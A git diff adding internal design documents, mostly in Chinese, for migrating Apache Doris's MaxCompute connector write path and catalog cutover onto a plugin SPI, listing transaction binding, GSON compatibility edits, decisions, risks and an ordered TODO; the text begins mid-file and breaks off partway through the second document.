+`max_compute` 连接器写**计划**面缺失:无 `Connector.getWritePlanProvider` / `ConnectorWritePlanProvider.planWrite` / ODPS 写 session 创建。T04 把 legacy 写计划(`MCTransaction.beginInsert` 建写 session + `MaxComputeTableSink.bindDataSink/setWriteContext` 产 `TMaxComputeTableSink`)港入连接器,over W5 opaque-sink seam。**gate 关、dormant**(`max_compute` 未进 `SPI_READY_TYPES`,executor/binding 未接线),零 live 风险。 + +**OQ-2 = 本 task 核心难点**:W5 的 `PluginDrivenTableSink.bindViaWritePlanProvider()` 现以**空** writeContext + 硬编码 `overwrite=false` 调 `planWrite`;legacy 经 `MCInsertExecutor.beforeExec` 运行期注入的 `txn_id`/`write_session_id`、以及 overwrite/静态分区 context,需在 plugin-driven 写侧**重建**。 + +--- + +## Recon 事实(code-grounded,2026-06-06) + +### A. SPI 写-plan 面(`fe-connector-api`,W1 已建,MC 是首个 adopter) +- `write/ConnectorWritePlanProvider.java`:`ConnectorSinkPlan planWrite(ConnectorSession session, ConnectorWriteHandle handle)`(单方法)。 +- `write/ConnectorSinkPlan.java`:`ConnectorSinkPlan(TDataSink dataSink)` + `getDataSink()`(包 opaque thrift)。 +- `handle/ConnectorWriteHandle.java`:`getTableHandle()` / `getColumns()` / `isOverwrite()` / `getWriteContext():Map`(**自由 map**)。 +- `Connector.java`:`default getWritePlanProvider()` 回 null(getScanPlanProvider 同形,镜像之)。 +- `ConnectorSession.java`:`getCurrentTransaction():Optional`(default empty)、`allocateTransactionId()`(T03 加)、`getCatalogProperties()`/`getProperty()`。 +- **全连接器无 `ConnectorWritePlanProvider` impl** → MC 首个,无模板。 + +### B. W5 接线(fe-core `planner/PluginDrivenTableSink`)—— OQ-2 seam +- `bindDataSink(Optional insertCtx)`(:180)= 入口,于 **`finalizeSink`** 调(译后、`beforeExec` 前,**携 insertCtx**)。plan-provider 模式 → `bindViaWritePlanProvider()`(:210)。 +- `bindViaWritePlanProvider()`(:210-215)**现忽略 insertCtx**:`new PluginDrivenWriteHandle(tableHandle, connectorColumns, false, Collections.emptyMap())` → `planWrite()` → `this.tDataSink = sinkPlan.getDataSink()`。类注释明示「per-connector adopter (P4+) 从自己的 insert context 填,W-phase 只立空 seam」。 +- 两构造:config-bag(`writeConfig`,JDBC/hive-file 用)与 plan-provider(`writePlanProvider`+session+tableHandle+columns,:134)互斥。**MC 走 plan-provider;JDBC 不受影响**。 +- `PluginDrivenInsertCommandContext extends BaseExternalTableInsertCommandContext`:**仅 `overwrite` 标志,无静态分区**。 +- `PhysicalPlanTranslator.visitPhysicalConnectorTableSink`(:645-704):`writePlanProvider=connector.getWritePlanProvider(); if(!=null) new PluginDrivenTableSink(targetTable, writePlanProvider, connSession, providerTableHandle, connectorColumns)`。 + +### C. Executor 生命周期序(OQ-2 关键) +`beginTransaction`(`txnId=transactionManager.begin()`,**译前**)→ **PLAN TRANSLATE** → `finalizeSink`→`sink.bindDataSink(insertCtx)` → `beforeExec` → `execImpl`(coordinator 下发)→ `onComplete`(finishInsert)→ commit。 +⇒ **`txn_id` 译前已生;legacy `write_session_id` 译后于 `MCInsertExecutor.beforeExec` 建**(`(MCTransaction)txnMgr.getTransaction(txnId)).beginInsert(table,insertCtx)` + `mcTableSink.setWriteContext(txnId, tx.getWriteSessionId())`,:62-71)。 + +### D. Legacy 写计划逻辑(港的源) +- `MCTransaction.beginInsert`(:87-142):`TableIdentifier tableId=catalog.getOdpsTableIdentifier(db,name)`;`isDynamicPartition=!table.getPartitionColumns().isEmpty()`;静态分区由 `MCInsertCommandContext.getStaticPartitionSpec()`(map)→ 按**分区列序**拼 `"col=val,col=val"`;`isOverwrite=mcCtx.isOverwrite()`。 + ```java + TableWriteSessionBuilder b = new TableWriteSessionBuilder() + .identifier(tableId).withSettings(catalog.getSettings()) + .withMaxFieldSize(catalog.getMaxFieldSize()) + .withArrowOptions(ArrowOptions.newBuilder().withDatetimeUnit(MILLI).withTimestampUnit(MILLI).build()); + if (isStaticPartition) b.partition(new PartitionSpec(staticPartitionSpecStr)); + else if (isDynamicPartition) b.withDynamicPartitionOptions(DynamicPartitionOptions.createDefault()); + if (isOverwrite) b.overwrite(true); + TableBatchWriteSession ws = b.buildBatchWriteSession(); + writeSessionId = ws.getId(); nextBlockId.set(0); + ``` +- `MaxComputeTableSink.bindDataSink`:`tSink` set `properties(catalog.getProperties())`/`endpoint`/`project(defaultProject)`/`tableName`/`quota`/`connectTimeout`/`readTimeout`/`retryCount`/`partitionColumns`(**取自 table 分区列名**,非 insert 列)/`staticPartitionSpec`(map,field 10)→ `tDataSink=new TDataSink(MAXCOMPUTE_TABLE_SINK).setMaxComputeTableSink(tSink)`。`setWriteContext(txnId, writeSessionId)` 仅盖 `txn_id`+`write_session_id`。 + +### E. thrift `TMaxComputeTableSink`(`gensrc/thrift/DataSinks.thrift:586`,18 字段) +`session_id`(1, legacy tunnel, **不用**) · access_key(2)/secret_key(3)/endpoint(4)/project(5)/table_name(6)/quota(7) · `block_id_start`(8)/`block_id_count`(9)(**运行期** BE 经 txn_id 调 T03 `allocateWriteBlockRange` 分配,**planWrite 不盖**)· `static_partition_spec`(10, map) · connect/read_timeout(11/12)/retry_count(13) · `partition_columns`(14, list) · `write_session_id`(15) · `properties`(16, map, 含鉴权) · max_write_batch_rows(17, deprecated) · `txn_id`(18, 注释「for runtime block_id allocation」)。 + +### F. 连接器脚手架(已就位) +- `MaxComputeConnectorTransaction.setWriteSession(String writeSessionId, TableIdentifier tableIdentifier, EnvironmentSettings settings)`(T03 槽,:92)+ `getTransactionId()`。 +- `MaxComputeTableHandle`:`getDbName/getTableName/getOdpsTable():Table/getTableIdentifier():TableIdentifier`。 +- `MaxComputeScanPlanProvider`(:157)唯一建 `EnvironmentSettings.newBuilder().withCredentials().withServiceEndpoint(connector.getClient().getEndpoint()).withQuotaName(connector.getQuota()).withRestOptions().build()`;构造仅持 `MaxComputeDorisConnector`。 +- `MaxComputeDorisConnector`:`getScanPlanProvider()` 模式(`ensureInitialized()`+持有字段);持 `odps/endpoint/defaultProject/quota/structureHelper/properties` + getters。 +- `MaxComputeConnectorMetadata`:`beginTransaction(session)`(T03)+ `getTableHandle(session,db,tbl)`(产 `MaxComputeTableHandle`,含 live `Table`+`TableIdentifier`);**未** impl `ConnectorWriteOps`。 +- `MCConnectorProperties`:ENDPOINT/PROJECT/ACCESS_KEY/SECRET_KEY/QUOTA/CONNECT_TIMEOUT/READ_TIMEOUT/RETRY_COUNT/`MAX_FIELD_SIZE`(8388608)/MAX_WRITE_BATCH_ROWS/REGION/TUNNEL/auth.type。 + +--- + +## OQ-2 解法 = **Approach A(planWrite 一处定,finalizeSink 时机)** + +`planWrite` 于 `finalizeSink`(bindDataSink)跑——此时 `txnId` 已生(beginTransaction,译前)、ODPS 写 session 可就地建——故 **planWrite 一处做完**: +1. 读 `handle.isOverwrite()` + `handle.getWriteContext()`(静态分区); +2. 建 `EnvironmentSettings`(连接器侧,见决策 D-3); +3. 港 `beginInsert` 建 ODPS 写 session → `writeSessionId`; +4. `session.getCurrentTransaction()` → `MaxComputeConnectorTransaction` → `setWriteSession(writeSessionId, tableId, settings)` 绑定(T03 槽); +5. 建 `TMaxComputeTableSink`:静态字段(D 节)+ `static_partition_spec` + `partition_columns` + `write_session_id` + `txn_id`(= `tx.getTransactionId()`);**不盖 block_id**(运行期 T03); +6. 回 `ConnectorSinkPlan(new TDataSink(MAXCOMPUTE_TABLE_SINK).setMaxComputeTableSink(tSink))`。 + +**否决 Approach B(泛化 legacy 运行期注入)**:给 `PluginDrivenTableSink` 加 `setWriteContext` + executor 存 sink 引用 + `beforeExec` 注入 + 新 SPI「beforeExec 产运行期 context」。理由:写 session 建在 finalizeSink vs beforeExec **语义无差**(均 FE 侧、译后、BE 前);A 单 locus、无 sink 后改、无新 SPory/executor hook(**Rule 2**)。handoff 亦定 A。 + +> **依赖(Batch C 接线,非 T04)**:planWrite 的 `getCurrentTransaction()` 要返 MC txn ⇒ Batch C 的 `beginTransaction` 须 `writeOps.beginTransaction(session)` 并把 connectorTx 置于 `ConnectorSessionImpl`(加 setCurrentTransaction)。dormant 期 planWrite 不跑,correct-by-design。 + +--- + +## 决策(fork,**用户签字 2026-06-06**) + +### D-1(OQ-2 架构)= **Approach A**(见上)。handoff 预定,列 B 为否决备选。 + +### D-2(fe-core seam 填充范围)= **(a) 含 seam fill**(✅ **用户签字 2026-06-06**) +T04 含 fe-core W5 seam 填充:① `PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 insertCtx 填 handle 的 `overwrite` + `writeContext`(静态分区);② `PluginDrivenInsertCommandContext`(或基类)加**通用** `Map staticPartitionSpec` + getter(dormant,binding 期填充归 Batch C/D)。**理由**:OQ-2 是 T04 核心(handoff/DV-009);这是「填 W-phase 立的空 seam」非「改 W-phase 决策」;zero live(仅 plan-provider 分支、dormant)。T03 已先例改 fe-core(ConnectorSession/Impl)。 +- **(b) 纯连接器侧**(否决):全部 seam 填充挪 Batch C;T04 不自洽(planWrite 写就但无 fe-core 喂数据)。 + +> **执行节奏(用户签字 2026-06-06)**:本 session = 设计 + 签字,**不写实现**;下一 fresh session 按本文 Ordered TODO 落地(split-session 节奏,playbook §7.1→§7.2)。 + +### D-3(EnvironmentSettings 复用)= **抽到连接器 `MaxComputeDorisConnector.getSettings()`**(镜像 legacy `catalog.getSettings()`),scan/write provider 共用。轻动 scan provider(把 :157 构造上移)。备选:write provider 自建(~5 行重复,Rule 3 不碰 scan)。倾向抽出(单源、对齐 legacy)。**次要,可主线定**。 + +### D-4(insert 机制面)= **`supportsInsert()`=true,其余最小化**。`getWriteConfig`/`beginInsert`/`finishInsert`:MC 走 plan-provider(sink 经 planWrite)、commit 经 T03 `ConnectorTransaction.commit()`,故 beginInsert/finishInsert 对 MC **无实质活**(no-op 或不实现)。最终以 Batch C executor 实际调用面为准;T04 先 `supportsInsert`=true + 必要 no-op。**次要,可主线定**。 + +### D-5(writeContext 编码)= **静态分区直接作 `getWriteContext()` 的 col→val map**;overwrite 经 `isOverwrite()`。planWrite 据分区列序拼 `"col=val,..."` 喂 `PartitionSpec`、并原样 set 入 `static_partition_spec`(field 10)。**次要,可主线定**。 + +--- + +## legacy → T04 SPI 映射 + +| legacy | T04 | 备注 | +|---|---|---| +| `MCTransaction.beginInsert`(建写 session)| `MaxComputeWritePlanProvider.planWrite` 内港 | 时机 beforeExec→finalizeSink(均译后,无差)| +| `MaxComputeTableSink.bindDataSink`(静态字段)| planWrite 建 `TMaxComputeTableSink` 静态字段 | endpoint/project/tableName/quota/timeouts/partitionColumns/staticPartitionSpec/properties | +| `MaxComputeTableSink.setWriteContext(txnId,wsid)`(运行期注入)| planWrite 直盖 `txn_id`(=`tx.getTransactionId()`)+`write_session_id` | **A 解法**:一处盖,无运行期 hook | +| `MCInsertExecutor.beforeExec`(cast+注入)| **消失**(逻辑入 planWrite)| OQ-1:验 MCInsertExecutor 成死代码(Batch D/T08)| +| `catalog.getSettings()` | `connector.getSettings()`(D-3 抽出)| EnvironmentSettings | +| `catalog.getMaxFieldSize()` | `MCConnectorProperties.MAX_FIELD_SIZE`(8388608) | | +| block_id 分配 | **不在 planWrite**(T03 `allocateWriteBlockRange` 运行期)| txn_id 使能之 | +| `Connector.getWritePlanProvider`(缺)| `MaxComputeDorisConnector.getWritePlanProvider()` | 镜像 getScanPlanProvider | + +--- + +## Why +- **A 单 locus**:finalizeSink 时 txn_id 已在、session 可就地建 → 无需 sink 后改 / 运行期 hook(Rule 2)。 +- **填空 seam ≠ 改 W-phase**:W5 注释明示 adopter 填 writeContext;T04 是 adopter(不违「别回头改 W-phase」)。 +- **静态分区入通用 context**:放基类 `Map`,未来 hive/iceberg 复用(非 MC 特例)。 +- **commit 归 T03**:finishInsert 对 MC no-op;`ConnectorTransaction.commit()`(T03)落 `session.commit`。 + +--- + +## Deviations / 坑(R12 不静默) +- **DV(提案 DV-012)**:legacy `partition_columns` 取 `targetTable.getPartitionColumns()`(fe-core Doris Column);连接器侧取 `MaxComputeTableHandle.getOdpsTable()` 的 ODPS 分区列(odps-sdk)——**源不同、值同**(分区列名)。doc-sync 入 deviations-log。 +- **DV-009(已存)**:W5 planWrite layer;T04 是其 adopter 落地。 +- **import-gate**(坑5):连接器禁 `common.*`(`Config`/`UserException`);异常用 `DorisConnectorException`。允许 `thrift.*`(`TMaxComputeTableSink`/`TDataSink`/`TDataSinkType`)。 +- **fe-core 侧改**(D-2a):`PluginDrivenTableSink`/`PluginDrivenInsertCommandContext` 在 fe-core,**不受 import-gate**(gate 只扫连接器→fe-core 单向)。 +- **ODPS SDK jar**(坑10):写 session 类在 odps-sdk-table-api(`EnvironmentSettings`/`TableWriteSessionBuilder`/`TableBatchWriteSession`/`ArrowOptions`/`DynamicPartitionOptions`);`PartitionSpec`/`TableIdentifier` 在 odps-sdk-commons。**实现前 javap 核** `.identifier/.withMaxFieldSize/.withArrowOptions/.partition/.withDynamicPartitionOptions/.overwrite/.buildBatchWriteSession`、`TableBatchWriteSession.getId`。 + +--- + +## Risk Analysis +- **R-dormant**:T04 全 dormant(plan-provider 分支无 live caller、`max_compute` 未翻闸)。风险=Batch C 接线遗漏(getCurrentTransaction 喂 txn / binding 填 staticPartitionSpec)→ 编入 Batch C 检查单。 +- **R-OQ2-时机**:A 把写 session 建挪 finalizeSink(legacy beforeExec)。二者均译后/BE 前,**核读确认无中间态依赖**(insertCtx 译后即定、txnId 译前即定)。 +- **R-JDBC 回归**:seam 填充仅动 plan-provider 分支;config-bag(JDBC/hive-file)零触。守门 fe-core compile + 既有测护。 +- **R-static-partition 未填**:D-2a 加字段但 binding 期填充归 Batch C/D;翻闸前 INSERT OVERWRITE PARTITION 静态分区**不可用**——**设计意图**(dormant),Batch D binding 接线补,编入检查单。 + +--- + +## Test Plan(R12 不静默) +- **T04 gate**(与 T01/T02/T03 一致):连接器 compile(`-pl :fe-connector-maxcompute -am`)+ checkstyle 0 + import-gate 0;**改 fe-core ⇒ `-pl :fe-connector-maxcompute,:fe-core -am`**(坑6);读真实 BUILD/MVN_EXIT/CS_EXIT(坑7)。 +- **单测延至 P4-T10**(JUnit5 手写替身,无 mockito):planWrite golden(静态/动态分区 builder 参数、overwrite、`TMaxComputeTableSink` 字段、setWriteSession 绑定后 txn.commit 通)。T04 不加测(与计划一致,非静默跳过)。 + +--- + +## Ordered TODO +1. **写前核**:javap 核 odps-sdk 写 session API(坑10,见 Deviations)。 +2. **连接器**:新建 `MaxComputeWritePlanProvider implements ConnectorWritePlanProvider`:`planWrite`(OQ-2 解法 A 六步);持 `MaxComputeDorisConnector`(镜像 scan provider 构造)。 +3. **连接器**:`MaxComputeDorisConnector` 加 `writePlanProvider` 字段 + `getWritePlanProvider()`(ensureInitialized 模式)+ `getSettings()`(D-3 抽出 EnvironmentSettings)。 +4. **连接器**:`MaxComputeConnectorMetadata` impl `ConnectorWriteOps.supportsInsert()`=true(+ D-4 必要 no-op)。 +5. **fe-core seam(D-2a,待签字)**:`PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 insertCtx 填 handle overwrite+writeContext;`PluginDrivenInsertCommandContext`/基类加 `staticPartitionSpec` map + getter。 +6. **gate**:compile(后台)+ checkstyle + import-gate,读真实 EXIT。 +7. **doc-sync + 独立 commit `[P4-T04]`**(用户定时机):P4 计划 T04 ⏳→✅、PROGRESS、HANDOFF、decisions(D-025 T04 forks)、deviations(DV-012 partition_columns 源)。 diff --git a/plan-doc/tasks/designs/P4-T05-T06-cutover-design.md b/plan-doc/tasks/designs/P4-T05-T06-cutover-design.md new file mode 100644 index 00000000000000..68de67e20b96df --- /dev/null +++ b/plan-doc/tasks/designs/P4-T05-T06-cutover-design.md @@ -0,0 +1,222 @@ +# P4-T05 / P4-T06 — MaxCompute Cutover Design (Batch C) + +> Design-first. **✅ SIGNED OFF 2026-06-06** (DECISION-1 = A flag · DECISION-2 = two commits, flip last · DECISION-3 = binding in cutover — see §5). No code touched in this design session; implementation = next fresh session(s), T05 then T06. +> Anchors below were **re-verified against current code** (2026-06-06, branch `catalog-spi-05`) — recon line numbers from HANDOFF were corrected where they had drifted. +> Inputs: [P4 plan](../P4-maxcompute-migration.md) · [P4-T03 design](./P4-T03-write-txn-design.md) · [P4-T04 design](./P4-T04-write-plan-design.md) · [write RFC](./connector-write-spi-rfc.md) · [HANDOFF](../../HANDOFF.md). + +--- + +## 0. Scope & status + +Batch C = the **only live cutover** in the maxcompute migration. After the flip, a `max_compute` catalog deserializes to `PluginDrivenExternalCatalog` / `PluginDrivenExternalTable`, and read / write / DDL / partition / show all route through the SPI. + +| Task | Nature | Gate | Commit | +|---|---|---|---| +| **P4-T05** | Mechanical wiring (GSON image-compat + engine-name cases) | 🔒 still closed (dormant) | `[P4-T05]` | +| **P4-T06** | Live cutover: dormant→live write wiring + flip + R-004 | 🔓 **live** | `[P4-T06]` (flip as the *last, smallest* commit — see §4.5) | + +**Two SPI additions** (both default-preserving, zero impact on jdbc/es/trino): `ConnectorSession.setCurrentTransaction(...)` and `ConnectorWriteOps.usesConnectorTransaction()` (DECISION-1). Log under E11 / decisions-log at impl time. + +--- + +## 1. Background — current state (verified, file:line) + +### 1.1 The flip points (T05/T06 mechanical) +- `GsonUtils` (`fe-core/.../persist/gson/GsonUtils.java`): migrated connectors use `registerCompatibleSubtype` — catalogs at **:405-412** (es/jdbc/trino), tables at **:478-483**. **MaxCompute still uses legacy `registerSubtype`: catalog `:397`, table `:472`** (← real edit sites; HANDOFF's ~405/~478 pointed at the compat *block*, not the MC lines). Must **atomically replace** (RuntimeTypeAdapterFactory throws duplicate-label IAE if both forms coexist — P2-T03 precedent). +- `PluginDrivenExternalTable` (`fe-core/.../datasource/PluginDrivenExternalTable.java`): `getEngine()` switch `:196-215` (cases jdbc/es/trino-connector), `getEngineTableTypeName()` `:218-231`. Need `case "max_compute"` in both, returning `TableType.MAX_COMPUTE_EXTERNAL_TABLE.toEngineName()` / `.name()`. +- `PluginDrivenExternalCatalog.legacyLogTypeToCatalogType()` `:347-354`: only special-cases `TRINO_CONNECTOR → "trino-connector"`; **default branch `logType.name().toLowerCase(Locale.ROOT)` already yields `"max_compute"`** ⇒ **NO new case needed** (simpler than HANDOFF implied). +- `CatalogFactory` (`fe-core/.../datasource/CatalogFactory.java`): `SPI_READY_TYPES` at **:52** = `{"jdbc","es","trino-connector"}`; legacy MC switch `case "max_compute"` at **:146-149**. Flip = add `"max_compute"` to `:52`, delete `:146-149`. +- Image-compat enums to **KEEP**: `TableIf.TableType.MAX_COMPUTE_EXTERNAL_TABLE` (`:220`), `InitCatalogLog.Type.MAX_COMPUTE` (`:41`). + +### 1.2 The write lifecycle (verified order) +`InsertIntoTableCommand.initPlan` (`:261-360`): **(1) translate** (builds `PluginDrivenTableSink` + its own `connectorSession` via `catalog.buildConnectorSession()` — `PhysicalPlanTranslator.visitPhysicalConnectorTableSink:645-701`, session built `:658`) → **(2) `beginTransaction()`** (`:354`) → **(3) `finalizeSink()`** (`:355-356`) → later `executeSingleInsert` → `beforeExec` → coordinator → `onComplete`(commit) (`AbstractInsertExecutor:251-272`, `BaseExternalTableInsertExecutor.onComplete:92-126`). + +**Critical constraint:** the sink's `connectorSession` is built at step 1 (before the txn exists), and `PluginDrivenTableSink.planWrite(connectorSession, …)` (`PluginDrivenTableSink:222`) — i.e. **T04 Approach A, locked** — reads `session.getCurrentTransaction()` (`MaxComputeWritePlanProvider:197`, **fail-loud if absent** `:199`) at step 3. So the connectorTx must be **created (step 2) and bound onto the sink's session before step 3's `bindDataSink`**. + +### 1.3 The dormant→live gaps (verified) +| # | Gap (verified) | file:line | +|---|---|---| +| G1 | `ConnectorSession` has `getCurrentTransaction()` default `Optional.empty()`, **no setter**; `ConnectorSessionImpl` has no txn field | `ConnectorSession:75-78`; `ConnectorSessionImpl:32-56` | +| G2 | Live executor is `PluginDrivenInsertExecutor`, built for the **JDBC insert-handle model**: `getWriteConfig`(:97) + `beginInsert`(:101) + `finishInsert`(:109) — **all throwing-default for MC** (D-4) | `PluginDrivenInsertExecutor:70-104`; `MaxComputeConnectorMetadata:241,247,264` | +| G3 | `PluginDrivenTransactionManager.begin(connectorTx)` (W4, `:71-77`) stores only in its **local map — does NOT `putTxnById`** in `GlobalExternalTransactionInfoMgr` | `PluginDrivenTransactionManager:71-77` vs legacy `AbstractExternalTransactionManager.begin:42-48` | +| G4 | `UnboundConnectorTableSink` carries **no static-partition spec** (only `UnboundMaxComputeTableSink` does) | `UnboundTableSinkCreator:66-110` | +| G5 | `InsertIntoTableCommand:598` builds an **empty** `PluginDrivenInsertCommandContext`; `InsertOverwriteTableCommand:407-418` sets overwrite+staticSpec on **legacy** `MCInsertCommandContext` only | `InsertIntoTableCommand:564-598`; `InsertOverwriteTableCommand:407-418` | + +The BE→FE block-alloc callback `FrontendServiceImpl.getMaxComputeBlockIdRange:3680-3719` already looks the txn up by `getTxnById(txnId)` (`:3694`) and dispatches on `supportsWriteBlockAllocation()` (`:3696`) — generic (W3/W6). It will throw "Can't find txn" unless **G3** is fixed (the connectorTx must be globally registered). Same registry is used to feed `addCommitData` back from BE. + +--- + +## 2. The cutover in one picture + +``` +TRANSLATE ──> PluginDrivenTableSink{ connectorSession (no txn yet) } + │ +beginTransaction() [executor] ┌─ G1 setCurrentTransaction (SPI+impl) + ├─ usesConnectorTransaction()? ── yes (MC) ──┐ ├─ G2 executor restructure + │ │ ├─ G3 global txn registration + │ connectorTx = writeOps.beginTransaction(execSession) │ + │ txnId = pluginTxnMgr.begin(connectorTx) ── G3 registers ┘ + │ +finalizeSink() [executor] + ├─ sink.getConnectorSession().setCurrentTransaction(connectorTx) ← G1 + └─ super.finalizeSink → bindDataSink → planWrite(sinkSession) ← T04 Approach A reads txn, setWriteSession, stamps txn_id + (creates ODPS write session here) +BE exec ──> block-alloc RPC ──> FrontendServiceImpl.getMaxComputeBlockIdRange + ──> getTxnById(txnId) [needs G3] ──> connectorTx.allocateWriteBlockRange + ──> commit fragments fed back ──> getTxnById ──> connectorTx.addCommitData + +onComplete ──> transactionManager.commit(txnId) ──> connectorTx.commit() (aggregate WriterCommitMessage → ODPS session.commit) + +INSERT [OVERWRITE] [PARTITION(..)] ── G4 UnboundConnectorTableSink carries static spec + └─ G5 fill PluginDrivenInsertCommandContext{overwrite, staticPartitionSpec} + (consumed by PluginDrivenTableSink.bindViaWritePlanProvider:212-224) +``` + +--- + +## 3. P4-T05 — mechanical wiring (dormant, gate closed) + +Pure image-compat / engine-name plumbing; **no behavior change** while gate is closed. Mirrors P2 trino batch-B. + +1. `GsonUtils`: replace `registerSubtype(MaxComputeExternalCatalog…)` `:397` → `registerCompatibleSubtype(PluginDrivenExternalCatalog.class, "MaxComputeExternalCatalog")` (move into the `:405-412` block); same for table `:472` → `registerCompatibleSubtype(PluginDrivenExternalTable.class, "MaxComputeExternalTable")` (into `:478-483`). Atomic replace. +2. `PluginDrivenExternalTable.getEngine()` `:196-215` + `getEngineTableTypeName()` `:218-231`: add `case "max_compute"`. +3. `legacyLogTypeToCatalogType`: **no change** (default branch covers it — verified §1.1). Add a code comment noting MAX_COMPUTE relies on the default, to prevent a future "add a redundant case" churn. + +Gate: compile + checkstyle + import-gate (fe-core only). Commit `[P4-T05]`. Still dormant — `max_compute` not yet in `SPI_READY_TYPES`, so live catalogs remain legacy. + +> ⚠️ Intermediate-state caveat (P2 batch-B precedent): after the atomic GSON replace but **before** the flip, a freshly-created MC catalog cannot round-trip (compat subtype registered, but factory still legacy). Do not deploy between T05 and T06; land them close together. + +### 3.4 Implementation notes (T05 landed 2026-06-06 — gate-green, pending commit) +- **DB registration folded in (correction to §3.1 / §8 step 1).** The ordered TODO listed only catalog `:397` + table `:472`, but the **database** `:452` (`MaxComputeExternalDatabase`) was still a plain `registerSubtype`. Left un-migrated it throws `ClassCastException` post-flip: `MaxComputeExternalDatabase.buildTableInternal:44` casts `extCatalog` to `MaxComputeExternalCatalog`, but a replayed catalog is now `PluginDrivenExternalCatalog`. es/jdbc/trino migrated catalog+**db**+table together (their legacy DB classes are deleted). T05 therefore migrated **all three** GSON registrations to `registerCompatibleSubtype` + removed the 3 now-unused `maxcompute.*` imports. Verified safe: `InitDatabaseLog.Type.MAX_COMPUTE` has no replay-dispatch use (self-ref only); `dbLogType` is not `@SerializedName` → handled identically to the shipped es/jdbc/trino DBs. +- **Adversarial verification fan-out (4 read-only agents) — 2 alarms adjudicated as non-issues:** + - *`getMetaCacheEngine()` → "default" not "maxcompute"* = **false positive.** The plugin path loads schema via the connector (`PluginDrivenExternalTable.initSchema`) under the "default" bucket — exactly as shipped es/jdbc/trino tables (which never overrode it). `MaxComputeExternalMetaCache` is referenced only by legacy `MaxComputeExternalTable:71,122` (Batch-D dead code); partitions come from the connector (P4-T02). No override needed. + - *`getMysqlType()` → "BASE TABLE" not null* = **consistent with accepted precedent.** Migrated ES tables already went null→"BASE TABLE" (`ES_EXTERNAL_TABLE` is absent from `TableType.toMysqlType`) and shipped with no override. MC matching is the same accepted change. + - *dormancy ("a new MC catalog can't serialize in the T05↔flip window")* = the **already-documented** intermediate-state caveat above. The agent's suggested fix (keep `registerSubtype` too) is **wrong** — coexistence throws the duplicate-label IAE the atomic replace exists to avoid. No action. +- **Test:** `PluginDrivenExternalTableEngineTest` extended with 2 `max_compute` cases (engine = null; type name = `MAX_COMPUTE_EXTERNAL_TABLE`) — 9/9 green. Matches the file's existing Mockito helper (the §7 "no mockito" guidance is for new T06 files). +- **Gate (fe-core):** compile BUILD SUCCESS · checkstyle 0 · import-gate 0 · UT 9-0-0 (real BUILD/MVN_EXIT/CS_EXIT verified). + +--- + +## 4. P4-T06 — live cutover + +### 4.1 Dormant→live write wiring (the hard part — all dormant-safe, additive) + +**W-a (G1) — bind a txn into the session.** `ConnectorSession`: add `default void setCurrentTransaction(ConnectorTransaction txn) { throw … }` (or no-op default + override). `ConnectorSessionImpl`: add a `volatile ConnectorTransaction currentTransaction` field + `setCurrentTransaction` + `@Override getCurrentTransaction()`. `PluginDrivenTableSink`: add `getConnectorSession()` getter (field exists `:114`, no getter today). + +**W-b (DECISION-1) — capability signal.** Add `ConnectorWriteOps.usesConnectorTransaction()` default `false`; `MaxComputeConnectorMetadata` overrides `true`. The executor routes on this **before** touching any throwing-default write method. (Alternatives weighed in §5.) + +**W-c (G2) — `PluginDrivenInsertExecutor` restructure** (mirrors legacy `MCInsertExecutor`, which returns `TransactionType.MAXCOMPUTE` `:81-82` and pulls the txn from the manager): +- Extract connector/session/writeOps setup into a helper; call it at the **start of `beginTransaction()`** (currently built in `beforeExec:71-76`). +- `beginTransaction()`: + - txn-model: `connectorTx = writeOps.beginTransaction(execSession)` (`MaxComputeConnectorMetadata:264` → `new MaxComputeConnectorTransaction(session.allocateTransactionId())`); `txnId = ((PluginDrivenTransactionManager) transactionManager).begin(connectorTx)`. + - else: `super.beginTransaction()` (unchanged `:87-89`). +- `finalizeSink()` (override): if `connectorTx != null && sink instanceof PluginDrivenTableSink`, `((PluginDrivenTableSink) sink).getConnectorSession().setCurrentTransaction(connectorTx)` **before** `super.finalizeSink(...)`. +- `beforeExec()` (override): `if (connectorTx != null) return;` (write session already created by `planWrite`; no `getWriteConfig`/`beginInsert`). JDBC path unchanged. `doBeforeCommit`/`onFail` already guard on `insertHandle != null` (`:108`,`:140`) → null for MC ⇒ correctly skipped. +- `transactionType()`: txn-model → `TransactionType.MAXCOMPUTE` (enum value exists; profiling-only, low-risk — note it's MC-specific in a generic executor, acceptable while MC is the sole txn-model adopter). + +Two `ConnectorSession` instances exist (executor's, built for id-alloc; sink's, which planWrite reads) — the **txn is shared by reference** via W-a, so this is correct; a future simplification could unify them, out of scope here. + +**W-d (G3) — global registration.** `PluginDrivenTransactionManager.begin(connectorTx)` `:71-77`: also `Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().putTxnById(txnId, theWrappedTxn)` (mirror `AbstractExternalTransactionManager.begin:42-48`). Verify `commit`/`rollback` (`:80-…`) `removeTxnById` (add if missing — legacy removes at `AbstractExternalTransactionManager:54`). Without this, both the block-alloc RPC and the BE commit-data feedback throw "Can't find txn." + +### 4.2 Binding-time context: overwrite + static partition (G4+G5) + +> ⚠️ **INCOMPLETE — corrected by P0-3 / FIX-BIND-STATIC-PARTITION ([D-030], 2026-06-07).** G4/G5 below +> only wired the static spec into `UnboundConnectorTableSink` and `PluginDrivenInsertCommandContext` +> (for the BE write-plan). They did **NOT** mirror the legacy **bind-time** handling in +> `BindSink.bindConnectorTableSink`: (a) excluding the static partition columns from the bound columns, +> and (b) projecting the child to **full-schema** order. So the "faithful generic mirror" claim was +> false — the very INSERT-PARTITION regression DECISION-3 promised to prevent was live (no-column-list +> static INSERT threw at bind; reordered/partial explicit lists silently mis-mapped columns). P0-3 +> completes the mirror (gated by capability `SINK_REQUIRE_FULL_SCHEMA_ORDER`). See +> `reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md`. + +Required so **INSERT OVERWRITE** and **INSERT … PARTITION(col=val)** keep working post-cutover (else a user-visible regression at the flip). Faithful generic mirror of the legacy MC path: +- **G4**: `UnboundConnectorTableSink` — add `staticPartitionKeyValues` (+ ctor variant), mirroring `UnboundMaxComputeTableSink`. `UnboundTableSinkCreator:66-110`: pass static partitions to the connector unbound sink for plugin-driven tables. +- **G5**: fill `PluginDrivenInsertCommandContext` (already has `staticPartitionSpec`+getter/setter from T04; `overwrite` inherited from `BaseExternalTableInsertCommandContext:24`): + - `InsertIntoTableCommand` ~`:567-598`: mirror the MC branch `:564-581` — extract static spec from the unbound sink, `setStaticPartitionSpec(...)` on the (no-longer-empty) `PluginDrivenInsertCommandContext`. + 